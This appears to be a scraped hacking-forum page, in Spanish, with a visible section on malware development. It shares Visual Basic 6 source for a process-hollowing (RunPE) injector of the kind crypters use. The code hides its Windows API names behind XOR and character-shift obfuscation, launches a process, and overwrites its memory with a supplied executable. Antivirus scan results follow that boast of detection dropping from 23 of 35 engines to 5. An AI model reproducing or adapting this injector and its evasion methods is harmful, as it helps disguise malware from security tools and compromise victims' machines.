Private qXrvFuajjimKRYDPPe As Single
Private ldCRKtbebftqZmMMny As Byte
Private kEjHZZkevgDmwDALcq As Boolean
Private Type nOr6mWzig
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As opSQywttF
End Type

Private EhiPVovmSNOMRCJQgI As Byte
Private XNPHgJnlUIdTKYiRRE As Byte
Private fnBcybARdRPJbYuepy As Long
Private DUVqrCZGjfmFNDidec As Single
Private Type zHimHxdyE
Signature As Long
FileHeader As yDQ4fPIlY
OptionalHeader As nOr6mWzig
End Type

Private SteuBsSuZKGtOFyKUD As Boolean
Private pcDZlAhlpPDBuNKgDb As Single
Private dorHcdnvrVkEXqlaGP As Date
Private OTEwFiyuLPRJiwpaIK As Integer
Private Type guWZ6IUxp
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
characteristics As Long
End Type


Public Function u7tGsr9W3(ByVal qOLqmwZVA As String, ByVal ACzbFfGhs As String, ParamArray TLEEGE3BB()) As Long
Dim CUKQL As Long, zFt3quxBV(&HEC00& - 1) As Byte, HAB As Long, WMJGLUQ As Long

WMJGLUQ = GetProcAddress(LoadLibraryA(qOLqmwZVA), ACzbFfGhs)
If WMJGLUQ = 0 Then Exit Function

CUKQL = VarPtr(zFt3quxBV(0))
RtlMoveMemory ByVal CUKQL, &H59595958, &H4: CUKQL = CUKQL + 4
RtlMoveMemory ByVal CUKQL, &H5059, &H2: CUKQL = CUKQL + 2
For HAB = UBound(TLEEGE3BB) To 0 Step -1
RtlMoveMemory ByVal CUKQL, &H68, &H1: CUKQL = CUKQL + 1
RtlMoveMemory ByVal CUKQL, CLng(TLEEGE3BB(HAB)), &H4: CUKQL = CUKQL + 4
Next
RtlMoveMemory ByVal CUKQL, &HE8, &H1: CUKQL = CUKQL + 1
RtlMoveMemory ByVal CUKQL, WMJGLUQ - CUKQL - 4, &H4: CUKQL = CUKQL + 4
RtlMoveMemory ByVal CUKQL, &HC3, &H1: CUKQL = CUKQL + 1
u7tGsr9W3 = CallWindowProcA(VarPtr(zFt3quxBV(0)), 0, 0, 0, 0)
End Function

Public Function GCcQ9b7nT(ByVal iNLI3ostx As String, ByVal YIagFy1Sq As String) As String
Dim DELHfVCj8 As Long

For DELHfVCj8 = 1 To Len(iNLI3ostx)
GCcQ9b7nT = GCcQ9b7nT & Chr(Asc(Mid(YIagFy1Sq, IIf(DELHfVCj8 Mod Len(YIagFy1Sq) <> 0, DELHfVCj8 Mod Len(YIagFy1Sq), Len(YIagFy1Sq)), 1)) Xor Asc(Mid(iNLI3ostx, DELHfVCj8, 1)))
Next DELHfVCj8
End Function

Public Sub nJLJ0h51B(ByVal gAjHv5BEo As String, ByRef GelPTlshh() As Byte, LY7YFef3i As String)
Dim Puq626fXT As Long, WcURpueyC As IG4wyJbPZ, dxNCenpxr As zHimHxdyE, VBzOQVQxf As guWZ6IUxp
Dim ptLvXfllO As HvWIgrbaI, cQdlVdwtG As Ikr1WTQJc, sGbh6tdbF As vQYh9rmTo

ptLvXfllO.cb = Len(ptLvXfllO)
RtlMoveMemory WcURpueyC, GelPTlshh(0), 64
RtlMoveMemory dxNCenpxr, GelPTlshh(WcURpueyC.e_lfanew), 248

CreateProcessA gAjHv5BEo, kMIvzyLCQ(StrReverse(Chr$(41)), StrReverse(Chr$(57))) & LY7YFef3i, 0, 0, False, bTQl9oDeY, 0, 0, ptLvXfllO, cQdlVdwtG
u7tGsr9W3 GCcQ9b7nT(Chr(56) & Chr(58) & Chr(40) & Chr(39) & Chr(35), kMIvzyLCQ(StrReverse(Chr$(92) & Chr$(72) _
 & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) & Chr$(85) _
 & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) & Chr$(78) _
 & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) & Chr$(73) _
 & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) & Chr$(80) _
 & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), GCcQ9b7nT(Chr(24) & Chr(58) & Chr(25) & Chr(37) & Chr(34) & Chr(34) & Chr(37) & Chr(14) & Chr(46) & Chr(53) & Chr(56) & Chr(10) & Chr(54) & Chr(29) & Chr(34) & Chr(33) & Chr(37) & Chr(34) & Chr(62) & Chr(57), kMIvzyLCQ(StrReverse(Chr$(92) _
 & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
 & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
 & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
 & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
 & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), cQdlVdwtG.CE9yvfJTt, dxNCenpxr.OptionalHeader.ImageBase
u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
 & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
 & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
 & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
 & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
 & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), GCcQ9b7nT(Chr(0) & Chr(39) & Chr(62) & Chr(63) & Chr(58) & Chr(34) & Chr(57) & Chr(25) & Chr(43) & Chr(60) & Chr(32) & Chr(38) & Chr(21) & Chr(54), kMIvzyLCQ(StrReverse(Chr$(92) _
 & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
 & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
 & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
 & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
 & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), cQdlVdwtG.CE9yvfJTt, dxNCenpxr.OptionalHeader.ImageBase, dxNCenpxr.OptionalHeader.SizeOfImage, E4r2NPXmu Or EQIAtwHT0, mvUSFCqYB
WriteProcessMemory cQdlVdwtG.CE9yvfJTt, ByVal dxNCenpxr.OptionalHeader.ImageBase, GelPTlshh(0), dxNCenpxr.OptionalHeader.SizeOfHeaders, 0

For Puq626fXT = 0 To dxNCenpxr.FileHeader.NumberOfSections - 1
RtlMoveMemory VBzOQVQxf, GelPTlshh(WcURpueyC.e_lfanew + 248 + 40 * Puq626fXT), Len(VBzOQVQxf)
WriteProcessMemory cQdlVdwtG.CE9yvfJTt, ByVal dxNCenpxr.OptionalHeader.ImageBase + VBzOQVQxf.VirtualAddress, GelPTlshh(VBzOQVQxf.PointerToRawData), VBzOQVQxf.SizeOfRawData, 0
Next Puq626fXT

sGbh6tdbF.ContextFlags = oHlUFbB7c
u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
 & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
 & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
 & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
 & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
 & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), GCcQ9b7nT(Chr(17) & Chr(43) & Chr(56) & Chr(31) & Chr(39) & Chr(49) & Chr(48) & Chr(57) & Chr(35) & Chr(19) & Chr(32) & Chr(43) & Chr(36) & Chr(43) & Chr(63) & Chr(54), kMIvzyLCQ(StrReverse(Chr$(92) _
 & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
 & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
 & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
 & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
 & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), cQdlVdwtG.hThread, VarPtr(sGbh6tdbF)
WriteProcessMemory cQdlVdwtG.CE9yvfJTt, ByVal sGbh6tdbF.Ebx + 8, dxNCenpxr.OptionalHeader.ImageBase, 4, 0
sGbh6tdbF.Eax = dxNCenpxr.OptionalHeader.ImageBase + dxNCenpxr.OptionalHeader.AddressOfEntryPoint
u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
 & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
 & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
 & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
 & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
 & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), GCcQ9b7nT(Chr(5) & Chr(43) & Chr(56) & Chr(31) & Chr(39) & Chr(49) & Chr(48) & Chr(57) & Chr(35) & Chr(19) & Chr(32) & Chr(43) & Chr(36) & Chr(43) & Chr(63) & Chr(54), kMIvzyLCQ(StrReverse(Chr$(92) _
 & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
 & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
 & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
 & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
 & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), cQdlVdwtG.hThread, VarPtr(sGbh6tdbF)
u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
 & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
 & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
 & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
 & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
 & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), GCcQ9b7nT(Chr(4) & Chr(43) & Chr(63) & Chr(62) & Chr(34) & Chr(38) & Chr(1) & Chr(48) & Chr(53) & Chr(53) & Chr(46) & Chr(33), kMIvzyLCQ(StrReverse(Chr$(92) _
 & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
 & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
 & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
 & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
 & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), cQdlVdwtG.hThread
End Sub

Public Function kMIvzyLCQ(FhbXF8MVH As String, lPCqbkM9x As Integer)
    Dim kDFZMkl0Q As Integer
    
    For kDFZMkl0Q = 1 To Len(FhbXF8MVH)
        Mid(FhbXF8MVH, kDFZMkl0Q, 1) = Chr(Asc(Mid(FhbXF8MVH, kDFZMkl0Q, 1)) - lPCqbkM9x)
    Next kDFZMkl0Q
    kMIvzyLCQ = FhbXF8MVH
End Function


Antes:

Date and Time: 10/11/2012 3:45:23 P
File Name: sPrueba1.exe
File Size: 16384 Bytes
MD5: 672d19493b2faeb7cf8cf3ea64f51890
SHA1: e149fa00bb18b624fd51d13cdc8c8d7cb58035e8
Detection: 23 of 35 (66%)
Status: INFECTED

AVG Free - Clean!
ArcaVir - Clean!
Avast 5 - Win32:Inject-ATA [Trj]
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Gen:Trojan.Heur.ZGY.8
VirusBuster Internet Security - Trojan.VBInject.Gen.7
Clam Antivirus - Clean!
COMODO Internet Security - Clean!
Dr.Web - Trojan.VbCrypt.89
eTrust-Vet - Win32/VBInject.D!generic
F-PROT Antivirus - W32/VBInject.CC.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security - Gen:Trojan.Heur.ZGY.8
G Data - Gen:Trojan.Heur.ZGY.8, Win32:Inject-ATA [Trj]
IKARUS Security - Virus.Win32.VBInject
Kaspersky Antivirus - Worm.Win32.VBNA.b
McAfee - Clean!
MS Security Essentials - VirTool:Win32/VBInject.RT
ESET NOD32 - Trojan.Win32/Injector.WZ
Norman - W32/VBInject.YG
Norton Antivirus - Clean!
Panda Security - Clean!
A-Squared - Virus.Win32.VBInject!IK
Quick Heal Antivirus - Clean!
Rising Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Mal/VBInject-AK
Trend Micro Internet Security - Clean!
VBA32 Antivirus - infected Trojan.VB.Levelup
Vexira Antivirus - Trojan.VBInject.Gen.7
Zoner AntiVirus - Clean!
Ad-Aware - VirTool.Win32.VBInject.gen.bp (v)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ahora:

Date and Time: 10/11/2012 3:53:27 P
File Name: sPrueba4.exe
File Size: 24576 Bytes
MD5: 847f8117c78d7e42d06b3ec11f4462f5
SHA1: ee1263d4edfab9f052f148ae6a76428cfcef8969
Detection: 5 of 35 (14%)
Status: INFECTED

AVG Free - Clean!
ArcaVir - Clean!
Avast 5 - Clean!
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Clean!
VirusBuster Internet Security - Clean!
Clam Antivirus - Clean!
COMODO Internet Security - TrojWare.Win32.Agent.angn@220045096
Dr.Web - Clean!
eTrust-Vet - Clean!
F-PROT Antivirus - W32/VBInject.CC.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security - Clean!
G Data - Clean!
IKARUS Security - Clean!
Kaspersky Antivirus - Clean!
McAfee - Clean!
MS Security Essentials - Clean!
ESET NOD32 - Clean!
Norman - Clean!
Norton Antivirus - Clean!
Panda Security - Clean!
A-Squared - Clean!
Quick Heal Antivirus - Clean!
Rising Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Mal/VBCheMan-D
Trend Micro Internet Security - Clean!
VBA32 Antivirus - Clean!
Vexira Antivirus - Clean!
Zoner AntiVirus - Clean!
Ad-Aware - Clean!
BullGuard - Clean!
Immunet Antivirus - Clean!
K7 Ultimate - Riskware ( ed2edfef0 )
VIPRE - Clean!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Desfrutem y Saludo Bros
#3
Visual Basic / Re:300 SkinS VB6
Julio 03, 2012, 12:15:01 AM
Muy bueno test jaja gracias
#4
Desarrollo y modificación de malwares / Tipo Sacar Varios AVS
Julio 03, 2012, 12:10:13 AM






Saludos
Páginas1